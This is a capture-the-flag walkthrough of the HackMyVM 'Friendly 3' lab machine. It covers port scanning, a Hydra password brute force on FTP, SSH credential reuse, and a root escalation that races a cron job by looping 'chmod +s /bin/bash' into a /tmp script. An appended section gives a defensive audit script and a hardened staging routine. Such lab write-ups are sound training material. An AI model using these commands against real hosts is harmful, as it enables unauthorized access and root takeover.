Friendly 3
We were really looking forward to another machine from the friendly series by our beloved buddy RiJaba1. From here, I want to express my gratitude, as always, to everyone who contributes to this fantastic community. As you already know from other times, I will leave his YouTube channel and the page for you to download this machine below the blog.
Summary
nmap
attack brute force
ftp content download
privilege escalation
Recognition
# Nmap 7.93 scan initiated Wed Aug 23 10:20:22 2023 as: nmap -sSCV -p- --open --min-rate 4000 -vvv -n -Pn -oN escaneo 192.168.1.161
Nmap scan report for 192.168.1.161
Host is up, received arp-response (0.00084s latency).
Scanned at 2023-08-23 10:20:23 CEST for 12s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey:
| 256 bc463d8518bfc7bb14269a206cd33952 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFC2DVBfq6sqSsCS9Jg+TZN7bqZ4U5G/tKb5dD3M69VVHwPRuMmify8CmxFhlP33nMhZTvYSZIpjGuiPSjks5UA=
| 256 7b135a46a5623309249d3e67b6eb3fa1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICDxFT3mwConXgCXORTtuda6Onx3sMQgZb6CzY2tWc3l
80/tcp open http syn-ack ttl 64 nginx 1.22.1
|_http-title: Welcome to nginx!
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.22.1
MAC Address: 00:0C:29:04:53:C2 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 23 10:20:35 2023 -- 1 IP address (1 host up) scanned in 12.75 seconds
As we can see from the nmap scan, ports 21, 22, and 80 are open. The first thing I checked was if access to the FTP service was enabled with the anonymous account, but it appears that it's not. So, let's take a closer look at port 80.
whatweb http://192.168.1.162
http://192.168.1.162 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.22.1], IP[192.168.1.162], Title[Welcome to nginx!], nginx[1.22.1]
We don't get much information, so let's go straight to see what the website contains.
We come across this page, and as we can see, the most relevant thing on it is the two users, Juan and Sysadmin. Let's note down these names and continue investigating with some fuzzing to see if we can find anything else.
gobuster dir -u http://192.168.1.162 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.162
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/08/23 11:35:11 Starting gobuster in directory enumeration mode
===============================================================
===============================================================
2023/08/23 11:36:21 Finished
===============================================================
As we can see, we found absolutely nothing. If we look again at the nmap scan, with the FTP and SSH services running and two known users, Juan and Sysadmin, we can perform a brute-force attack with Hydra. In this case, we will try the FTP service.
hydra -l juan -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.162
[DATA] attacking ftp://192.168.1.162:21/
[21][ftp] host: 192.168.1.162 login: juan password: alexis
It worked; we found Juan's password, so let's log in.
ftp 192.168.1.162
We provide the username, in this case, Juan, and the password obtained earlier with Hydra. Once logged in, we find a ton of files. To download them all, we will use this command:
wget -r ftp://juan:alexis@192.168.1.162/
Once all files are downloaded, a folder will be created with the machine's IP address, and inside it will be all the files from the FTP service. We can use the tree command to display a tree structure, making it easier to visualize the contents of these files.
tree
.
├── file1
├── file10
├── file100
├── file11
├── file12
├── file13
├── file14
├── file15
├── file16
├── file17
├── file18
├── file19
├── file2
├── file20
├── file21
├── file22
├── file23
├── file24
├── file25
├── file26
├── file27
├── file28
├── file29
├── file3
├── file30
├── file31
├── file32
├── file33
├── file34
├── file35
├── file36
├── file37
├── file38
├── file39
├── file4
├── file40
├── file41
├── file42
├── file43
├── file44
├── file45
├── file46
├── file47
├── file48
├── file49
├── file5
├── file50
├── file51
├── file52
├── file53
├── file54
├── file55
├── file56
├── file57
├── file58
├── file59
├── file6
├── file60
├── file61
├── file62
├── file63
├── file64
├── file65
├── file66
├── file67
├── file68
├── file69
├── file7
├── file70
├── file71
├── file72
├── file73
├── file74
├── file75
├── file76
├── file77
├── file78
├── file79
├── file8
├── file80
├── file81
├── file82
├── file83
├── file84
├── file85
├── file86
├── file87
├── file88
├── file89
├── file9
├── file90
├── file91
├── file92
├── file93
├── file94
├── file95
├── file96
├── file97
├── file98
├── file99
├── fold10
├── fold11
├── fold12
├── fold13
├── fold14
├── fold15
├── fold4
├── fold5
│ └── yt.txt
├── fold6
├── fold7
├── fold8
│ └── passwd.txt
├── fold9
└── fole32
We didn't find much relevant information; RiJaba1 really trolled us well, hahahaha.
cat passwd.txt
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠛⠛⠛⠋⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠙⠛⠛⠛⠿⠻⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⡀⠠⠤⠒⢂⣉⣉⣉⣑⣒⣒⠒⠒⠒⠒⠒⠒⠒⠀⠀⠐⠒⠚⠻⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⡠⠔⠉⣀⠔⠒⠉⣀⣀⠀⠀⠀⣀⡀⠈⠉⠑⠒⠒⠒⠒⠒⠈⠉⠉⠉⠁⠂⠀⠈⠙⢿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀⠔⠁⠠⠖⠡⠔⠊⠀⠀⠀⠀⠀⠀⠀⠐⡄⠀⠀⠀⠀⠀⠀⡄⠀⠀⠀⠀⠉⠲⢄⠀⠀⠀⠈⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀⠀⠀⠊⠀⢀⣀⣤⣤⣤⣤⣀⠀⠀⠀⢸⠀⠀⠀⠀⠀⠜⠀⠀⠀⠀⣀⡀⠀⠈⠃⠀⠀⠀⠸⣿⣿⣿⣿
⣿⣿⣿⣿⡿⠥⠐⠂⠀⠀⠀⠀⡄⠀⠰⢺⣿⣿⣿⣿⣿⣟⠀⠈⠐⢤⠀⠀⠀⠀⠀⠀⢀⣠⣶⣾⣯⠀⠀⠉⠂⠀⠠⠤⢄⣀⠙⢿⣿⣿
⣿⡿⠋⠡⠐⠈⣉⠭⠤⠤⢄⡀⠈⠀⠈⠁⠉⠁⡠⠀⠀⠀⠉⠐⠠⠔⠀⠀⠀⠀⠀⠲⣿⠿⠛⠛⠓⠒⠂⠀⠀⠀⠀⠀⠀⠠⡉⢢⠙⣿
⣿⠀⢀⠁⠀⠊⠀⠀⠀⠀⠀⠈⠁⠒⠂⠀⠒⠊⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⢀⣀⡠⠔⠒⠒⠂⠀⠈⠀⡇⣿
⣿⠀⢸⠀⠀⠀⢀⣀⡠⠋⠓⠤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⠀⠀⠀⠈⠢⠤⡀⠀⠀⠀⠀⠀⠀⢠⠀⠀⠀⡠⠀⡇⣿
⣿⡀⠘⠀⠀⠀⠀⠀⠘⡄⠀⠀⠀⠈⠑⡦⢄⣀⠀⠀⠐⠒⠁⢸⠀⠀⠠⠒⠄⠀⠀⠀⠀⠀⢀⠇⠀⣀⡀⠀⠀⢀⢾⡆⠀⠈⡀⠎⣸⣿
⣿⣿⣄⡈⠢⠀⠀⠀⠀⠘⣶⣄⡀⠀⠀⡇⠀⠀⠈⠉⠒⠢⡤⣀⡀⠀⠀⠀⠀⠀⠐⠦⠤⠒⠁⠀⠀⠀⠀⣀⢴⠁⠀⢷⠀⠀⠀⢰⣿⣿
⣿⣿⣿⣿⣇⠂⠀⠀⠀⠀⠈⢂⠀⠈⠹⡧⣀⠀⠀⠀⠀⠀⡇⠀⠀⠉⠉⠉⢱⠒⠒⠒⠒⢖⠒⠒⠂⠙⠏⠀⠘⡀⠀⢸⠀⠀⠀⣿⣿⣿
⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠑⠄⠰⠀⠀⠁⠐⠲⣤⣴⣄⡀⠀⠀⠀⠀⢸⠀⠀⠀⠀⢸⠀⠀⠀⠀⢠⠀⣠⣷⣶⣿⠀⠀⢰⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠁⢀⠀⠀⠀⠀⠀⡙⠋⠙⠓⠲⢤⣤⣷⣤⣤⣤⣤⣾⣦⣤⣤⣶⣿⣿⣿⣿⡟⢹⠀⠀⢸⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣧⡀⠀⠀⠀⠀⠀⠀⠀⠑⠀⢄⠀⡰⠁⠀⠀⠀⠀⠀⠈⠉⠁⠈⠉⠻⠋⠉⠛⢛⠉⠉⢹⠁⢀⢇⠎⠀⠀⢸⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣀⠈⠢⢄⡉⠂⠄⡀⠀⠈⠒⠢⠄⠀⢀⣀⣀⣰⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⢀⣎⠀⠼⠊⠀⠀⠀⠘⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⡀⠉⠢⢄⡈⠑⠢⢄⡀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠁⠀⠀⢀⠀⠀⠀⠀⠀⢻⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣀⡈⠑⠢⢄⡀⠈⠑⠒⠤⠄⣀⣀⠀⠉⠉⠉⠉⠀⠀⠀⣀⡀⠤⠂⠁⠀⢀⠆⠀⠀⢸⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣄⡀⠁⠉⠒⠂⠤⠤⣀⣀⣉⡉⠉⠉⠉⠉⢀⣀⣀⡠⠤⠒⠈⠀⠀⠀⠀⣸⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣤⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣶⣤⣤⣤⣤⣀⣀⣤⣤⣤⣶⣾⣿⣿⣿⣿⣿
Let's try reusing Juan's credentials for the SSH service after seeing that there isn't much in the FTP service.
ssh juan@192.168.1.162
juan@friendly3:~$
Privilege Escalation
We got access as the user Juan via SSH. After looking around for a while to see how I could escalate privileges and not finding anything, I downloaded pspy to see which tasks the system runs automatically every so often.
Once downloaded, we set up a web server with Python on our machine:
python3 -m http.server 80
and on the victim machine, we download it using curl, because wget is not installed:
curl -O http://192.168.1.108/pspy32
We give execution permissions to the file with the chmod command:
chmod +x pspy32
and run the file:
./pspy32
We let it run for a couple of minutes, and it picks up this:
2023/08/23 07:56:01 CMD: UID=0 PID=967 | /bin/sh -c /opt/check_for_install.sh
2023/08/23 07:56:01 CMD: UID=0 PID=968 | /bin/bash /opt/check_for_install.sh
2023/08/23 07:56:02 CMD: UID=??? PID=969 | ???
2023/08/23 07:56:02 CMD: UID=0 PID=970 | chmod +r /tmp/a.bash
2023/08/23 07:56:02 CMD: UID=0 PID=971 | chmod +w /tmp/a.bash
2023/08/23 07:56:02 CMD: UID=0 PID=972 | /bin/bash /tmp/a.bash
As we can see, a script located in /opt is being executed as root every minute; let's see what it does.
#!/bin/bash
/usr/bin/curl "http://127.0.0.1/9842734723948024.bash" > /tmp/a.bash
chmod +x /tmp/a.bash
chmod +r /tmp/a.bash
chmod +w /tmp/a.bash
/bin/bash /tmp/a.bash
rm -rf /tmp/a.bash
This script downloads a file over plain HTTP from localhost into a fixed path in /tmp, gives it execute, read, and write permissions, runs it as a Bash script, and then deletes the downloaded file.
What we can do is create a script that loops, appending a command to /tmp/a.bash that makes /bin/bash setuid; since the root job runs that file, this elevates our privileges to root. Let's see it.
We create the script with nano inject.sh and add this code, a loop that keeps writing the chmod command into the downloaded file so that bash ends up setuid and our privileges are elevated:
#!/bin/bash
# Keep appending to the file the root job downloads and executes; once an
# append lands between the download and the execution, root runs the command.
while true; do
    echo "chmod +s /bin/bash" >> /tmp/a.bash
done
We give it execution permissions with chmod:
chmod +x inject.sh
We run it and leave it for a couple of minutes.
./inject.sh
If you're as impatient as I am, you can open another terminal and connect again via ssh with the user Juan and enter this command to monitor the /bin/bash every second to see when the permissions change.
watch -n 1 ls -l /bin/bash
Every 1.0s: ls -l /bin/bash friendly3: Wed Aug 23 08:25:08 2023
-rwsr-xr-x 1 root root 1265648 Apr 23 17:23 /bin/bash
As we can see, the permissions have already changed: that 's' has been added, so bash is now setuid. Finally, let's elevate privileges by taking advantage of this condition.
juan@friendly3:~$ bash -p
bash-5.2# whoami
root
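The root cause of this escalation is the staging pattern in /opt/check_for_install.sh: a root job writes to a fixed, predictable path in /tmp, makes it writable, and then executes it, which leaves a window any local user can race. The script below is an added example (not code from the write-up or from the Friendly 3 machine): a small audit that flags that pattern in a script, and the staging routine a hardened version of the job would use instead (a private mktemp -d directory with owner-only permissions plus a pinned checksum, so there is no reachable file to race). The function names and sample files are constructed for the example, and it assumes GNU sha256sum and mktemp are available.

```shell
#!/bin/sh
# Added example, not code from the write-up or from the Friendly 3 machine.
# Two pieces: an audit that flags the weak staging pattern seen in
# /opt/check_for_install.sh, and the staging routine a hardened version of
# that job would use instead. Function and sample-file names are assumptions.

# write_weak_sample PATH
# Constructed copy of the vulnerable pattern from the write-up: a fixed,
# predictable path in /tmp is filled by root, made writable, then executed.
write_weak_sample() {
    cat > "$1" <<'EOF'
#!/bin/bash
/usr/bin/curl "http://127.0.0.1/9842734723948024.bash" > /tmp/a.bash
chmod +x /tmp/a.bash
chmod +r /tmp/a.bash
chmod +w /tmp/a.bash
/bin/bash /tmp/a.bash
rm -rf /tmp/a.bash
EOF
}

# audit_staging_script FILE
# Prints one finding per line and returns 1 when FILE writes to a fixed /tmp
# path and later executes that same path; returns 0 when no such pair exists.
audit_staging_script() {
    file="$1"
    findings=0
    for target in $(grep -oE '/tmp/[^[:space:]"]+' "$file" | sort -u); do
        # lines that redirect output or curl -o into the fixed path
        written=$(grep -cE "(>|-o[[:space:]]+)[[:space:]]*$target" "$file" || true)
        # lines that hand that same path to sh/bash
        executed=$(grep -E '(^|[[:space:];&|])(/bin/)?(ba)?sh[[:space:]]+' "$file" \
                   | grep -cF "$target" || true)
        if [ "$written" -gt 0 ] && [ "$executed" -gt 0 ]; then
            echo "FINDING: $file stages into fixed path $target and executes it"
            findings=$((findings + 1))
        fi
        if grep -E 'chmod[[:space:]]+\+[rwx]*w' "$file" | grep -qF "$target"; then
            echo "FINDING: $file makes $target writable before running it"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}

# stage_and_run SRC EXPECTED_SHA256
# Hardened replacement for the staging step: the payload lands in a fresh
# mode-0700 directory from mktemp -d (unpredictable name, owner-only), is made
# read/execute only, and must match a pinned checksum before it runs. No other
# user can reach or modify the file, so there is no window to race.
# (A real job would fetch over HTTPS into $dir instead of cp from SRC.)
stage_and_run() {
    (
        umask 077
        dir=$(mktemp -d) || exit 1
        trap 'rm -rf "$dir"' EXIT
        cp "$1" "$dir/payload.bash" || exit 1
        chmod 500 "$dir/payload.bash"
        actual=$(sha256sum "$dir/payload.bash" | cut -d' ' -f1)
        if [ "$actual" != "$2" ]; then
            echo "checksum mismatch for $1, refusing to run" >&2
            exit 2
        fi
        /bin/bash "$dir/payload.bash"
    )
}

# Demo when run directly: audit a constructed copy of the weak job, then stage
# and run a benign constructed payload the hardened way.
demo() {
    work=$(mktemp -d)
    write_weak_sample "$work/check_for_install.sh"
    audit_staging_script "$work/check_for_install.sh" || echo "weak job flagged"
    printf '%s\n' 'echo "payload ran from $0"' > "$work/payload.bash"
    pinned=$(sha256sum "$work/payload.bash" | cut -d' ' -f1)
    stage_and_run "$work/payload.bash" "$pinned"
    rm -rf "$work"
}
demo
```

The audit is deliberately simple (a fixed /tmp path that is both written and executed in the same script), which is enough to catch the job on this machine and is cheap to run over /etc/cron* and systemd timer units; the hardened routine removes the race rather than narrowing it, because shortening the window with faster chmod calls would still leave the loop in inject.sh a chance to win.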
Conclusion
A very cool machine, thanks once again to RiJaba1 for making another great machine, thanks for your time buddy, and thanks to the community as always. Here's RiJaba1's YouTube channel where he uploads awesome content, and of course, the HackMyVM website so you can try this machine or any other one you choose. Thanks for reading and happy Hackinggg!!!